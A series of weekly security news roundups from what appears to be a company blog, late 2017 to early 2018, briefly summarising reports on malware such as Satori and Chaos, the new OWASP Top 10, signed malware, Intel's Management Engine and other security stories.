Security Roundup - 2018-02-23

Posted on  by

Sean is on a well earned vacation this week- so I will be filling in!


Trusting Third Party SDKs- If you know about the traditional MitM attacks, than this idea is a an evolutionary step- MitM the SDK and let the resulting binaries do the dirty work for you! Expect the numbers in this article to continue to drop as we head toward a more encrypted Internet.

Malware Gets Better Support than Hardware- An evolved variant of ‘Mirai’, called ‘Satori’, has been infecting home routers from Huawei, RealTek, and Dasan, at an alarming rate. It even gets updates, which is more than can be said for the hardware that it’s exploiting. Whereas Mirai could be avoided by changing the default password of the hardware, Satori is using firmware vulnerabilities to exploit devices.

Responding to Vulnerabilities in an Open Source World- This article focuses on how to quickly respond to vulnerabilities in open source software that are used in building your products. There is a heavy emphasis on tooling and automation, which is critical in getting updated done in a quick and efficient manner.

Linux Malware Using Raw Sockets- Another malware variant, this time from ‘sebd’, called ‘Chaos’ is making the round on linux servers. The use of raw sockets prevents blocking if a service is already on a port, which would allow for very stealthy listener.

NK Reaper Campaign- A full PDF from FireEye on the APT37/Reaper team that’s using malware to further North Korea’s interests in the world. They are targeting multiple CVEs with multiple malware packages.


Security Roundup - 2017-11-24

Posted on  by

LavaRand - Leveraging Real World Randomness. Did you know that CloudFlare harvests randomness from lava lamps as an entropy source? Using a real world source of entropy, they augment the pseudo-random pool on their servers with actual randomness. They’ve recently posted this article on their motivations behind going through the trouble to set this up.

Fake Symantec Blog Spreading Malware. A fake security blog attempting to look like the Symantec blog has been discovered by researchers. The site has been taken down, but contained a post to attempt to incent readers to download a ‘security tool’, which is actually a variant of the Proton credentials stealer.

Vulnerability Equities Process Transparency. The Whitehouse has announced additional transparency around the factors that play into whether or not government agencies notify vendors about discovered vulnerabilities. Mozilla feels it is a step in the right direction but several severity researchers are skeptical of the announcement. Notable, Bruce Schnier who suggests this is just additional window dressing and time will tell), Adam Shostack who points out the large list of threats [which are not considered factors in the VEP], and Sophos Security points out that this year we have seen plenty of non-disclosed vulnerabilities stolen and weaponized.

Session Recording Tools Scoop Up Excessive Data. Use a service that records what user’s are doing on your site (for analytics and usage review)? They may be scooping up much more information than expected, since many of them record all keystrokes and mouse clicks, including stuff that user’s may not actually intend to send to the site and in some cases researchers observed these scripts scooping up passwords, credit card numbers, and PII.

New OWASP Top 10. The Open Web Application Security Project (OWASP) has released a new version of their top 10 vulnerabilities this year. Unsurprisingly, Injection attacks is still listed as the #1 risk for web applications. However, we have 3 new entries. The first is XML External Entities (XEE) attacks, where XML parsers (in APIs, or otherwise) can potentially contain instructions and load external content allowing for DoS attacks or remote code execution. The second is Insecure Deserialization, which honestly feel very similar to injection and XEE, but targeted at object de/serialization. In this scenario, attackers can target deserialization of complex objects to try and invoke remote code execution. Finally, we have Insufficient Monitoring and Logging where not knowing what is going on greatly decreases the reaction time of defenders and increases the likelihood of successful exploitation by attackers.

Leveraging Multiple Vulnerabilities To Achieve Exploitation. Now that you have familiarized yourself with the new OWASP top 10, read this article on how they leveraged a number of these to chain their way to remote code execution.

Github starts highlighting out of data software. Github has taken a major step forward in security by helping people know when they are using software packages that are out of date (‘Using Components with Known Vulnerabilities’ is #9 on the OWASP Top 10). They’ve started with Ruby and Javascript, which covers 75% of projects with detectable dependencies today.

Misconfigured API access allows for data harvesting. Security researchers have discovered that many developers using the Twilio messaging API have hard coded credentials in their apps, effectively making it possible for other apps to collect Twilio metadata without a user noticing. At time of writing, this could impact more than 600 apps for both Android and iOS. This extends to other APIs as well, such as Amazon’s S3 access.


Security Roundup - 2017-11-17

Posted on  by and

Face ID Defeated? On the heels of the conjecture in the latest SecurityScorecard podcast comes the claim that Face ID has already been defeated. The technique to defeat FaceID involved a 3D print of a face, overlaid with 2D printed features.

Social login attacks. Social logins, like via Facebook, are everywhere. And now attackers are trying to leverage them for their own gain. Abusing browser extensions (again), an attacker can have code that waits for you to log into a social account, and use those credentials to try to create an account on other services. They can then use these services as they see fit, including some forms of fraud, or spreading their malware even further. InfoSecurity covers in more detail, as well as gives some tips on how to combat this type of attack.

Inside The Mind of a Bug Bounty Hunter. Bugcrowd has released their annual “Inside the Mind of a Hacker” report. This year indicates that 71% of their bug bounty hunters are between the ages of 18 and 29, and primarily driven by the challenge. US took the top spot for total number of researchers from India, who is number two this year.

Your Website is ALWAYS a Target. Think that your website isn’t really a target because you don’t collect user information? Think again! This week brings us two stories, one by Troy Hunt, going over how attackers can breach your system and use your domain reputation to reduce the likelihood of their malicious activity being shut down, and one by Malware tech, where malware authors are exploiting the same concept of reputation to host proxy servers to hide their actual C2 machines.

Pop-Unders Make Their Way To Mobile (Apps). Pop-unders, where a malicious ad redirects you to another site to coerce you into downloading some malicious app, is a technique that has been around for a number of years. This same concept has made its way to mobile apps, with one app being a payload to download a malicious app and prompting a user to install, avoiding a set of protections in app stores.

The operating system for your operating system. News broke this week that some Intel chipsets have a hidden operating system running on them. Part of Intel’s ‘Management Engine’, which had several exploits discovered back in May. The recent discovery however, is that it is running its own network stacks as well as a web server. More terrifying, because it is so low level, an exploit could have a persistent place to stay, invisible to the regular user. Even worse, this can potentially even make modifications when a machine is powered off (but still plugged in).

Antivirus abused to install malware. Antivirus is still just software, and subject to bugs like any other program. A recent news story shows how attackers can leverage these bugs to install malware that has already been quarantined, by abusing the ability of a user to restore it. The researchers combined this with other techniques to even trick the Antivirus code to restore the file in another location, like privileged and sensitive directories on Windows.

2018 Predictions. With 2017 nearing its end, some companies are starting to think about what 2018 will bring. Kaspersky starts things off with their 2018 Predictions. It should be no surprise for those following along this year that things like supply chain attacks, and hardware hacks are likely to continue, but a good review of current trends.


Security Roundup - 2017-11-10

Posted on  by

Digitally Signed Malware Surprisingly Common. Code signing is a method where a legitimate certificate is used to sign an application such that operating systems will trust it. However, in some cases we have seen malicious packages that are correctly signed. Originally tied to nation state attacks, and criminal enterprises, researchers have shown that this has actually happened more often than expected, having discovered 189 instances going back to 2003. 109 of the digital certificates used to sign these malicious apps are still valid. Some of these appear to have previously signed benign software, meaning that an organization may have lost control of their private keys. Related research have also published results on broken trust in digital key signing and Anti Virus. The most shocking is that something signed (even if using an expired key, or if the signature doesn’t match), will cause a number of Anti Virus programs to mark the files as benign, abusing trust. But perhaps more interesting is the ability to hijack signatures, which one researcher has demonstrated.

Mobile Pwn2Own Competition Results. Pwn2Own is a yearly competition in which hackers compete to discover zero days in browsers. Last year it expanded into Virtual Machines, and this year it has its own competition for Mobile Devices. A large number of bugs were discovered for devices including the Samsung Galaxy S8 and the iPhone 7, all of which have been privately disclosed to the manufacturers to create patches. You can read up on details for day one and day two.

Spam And Phishing Q3 Report. Want to stay on top of the latest spam and phishing techniques? Kaspersky has released their Q3 observations. Highlights are messages trying to coerce people into cryptocurrency get rich quick schemes and free stuff (from flights to phones).

Account Takeovers. Google has released research into the root cause of account takeovers. While not particularly surprising that a fair portion of it is due to credential reuse (use unique passwords everywhere!), a fair amount is gathered via phishing and keyloggers. Phishing attacks appear to increasingly try to collect other information, to help circumvent other protections.

Companies Actively Trying To Work Around Browser Security Warnings. What’s worse than a company not securing a form over HTTPS? Actively working around browser protections to try to pretend things are all right. Check out this….. Interesting story of the amount of effort one company put into evading browser checks rather than just integrate HTTPS.

Size Matters Not. At least in terms of your risk to exploit. Regardless of what your website actually does, it is valuable to an attacker in terms of resources. Even if you don’t have anything to directly steal, an attacker can leverage your infrastructure to run phishing attacks, malvertisements, or spam with less risk to themselves (and more risk to you!).

DarkVNC Deep Dive. And for those that like deep dives, check out this article going over an exploit to infect someone with ‘DarkVNC’, a malicious VNC client so attackers can view and control a machine remotely.


Security Roundup - 2017-11-03

Posted on  by

CyberSecurity Month Wraps Up. And WeLiveSecurity has finished up their expanded coverage of Twitter conversations. You can check out Part 3, wherein they cover “CyberAwareness” and Part 4 where they talk about the Internet of Things.

Hardware Hacking. Speaking of the Internet of Things, this week brings us an interesting article from a Pentester, going over his view on hardware hacking. Covering a number of attack vectors we have seen over the last year (and no surprise that outdated software is #1 in the list), but also covers more interesting stuff for those that have physical access.

Terrifying USB Find. I know this week was Halloween, but this news about a USB drive containing plaintext files on Heathrow Airport’s security was downright terrifying. Items included, but are not necessarily limited to, details about security badges, patrol routes, and even travel routes for the Queen and other traveling dignitaries.

Google’s Recaptcha Broken. Google’s system to try and distinguish people from robots has been broken again. This time, researchers have leveraged the improvements in speech to text engines to solve ~85% of captchas in ~5.4 seconds on average.

“Smart” Locks. Amazon has recently announced a locking system that would allow people to deliver things straight into your home. This is a risky proposition, and MalwareBytes gives some good reasons why, including security vulnerabilities and accidentally getting locked out of your own home.

Chrome to remove Public Key Pinning. Chrome developers have signaled their intention to remove Public Key Pinning (PKP) support from the browser in 2018. PKP was intended to be a method in which an organization can specify which HTTPS certificated are used to serve the site. However, in practicality they have been difficult to roll out, with a misconfiguration making it possible to have an outage until the specified timeout. Google now advocates the usage of certificate transparency, which they have made mandatory, to detect miss-issuance of certificates and protect users from them.

Dell Loses Control of Update Domain. Earlier this month, we learned that Dell lost control of a domain designed to help customers recover from malware. Ironic in that it was taken over by malware devs and likely used to serve the same exploits it was meant to help customers deal with.

More Malicious Chrome Extensions. The latest appears to be spread by phishing attacks, and is used to harvest any data posted to forms, like usernames, passwords and people’s Facebook updates. Malware Analysis Via API Calls. MalwareBytes has seen more obfuscation of malware making static analysis harder for malware devs. Rather than trying to reverse engineer the outer layer, they go into a technique of using dynamic analysis of system api calls doing.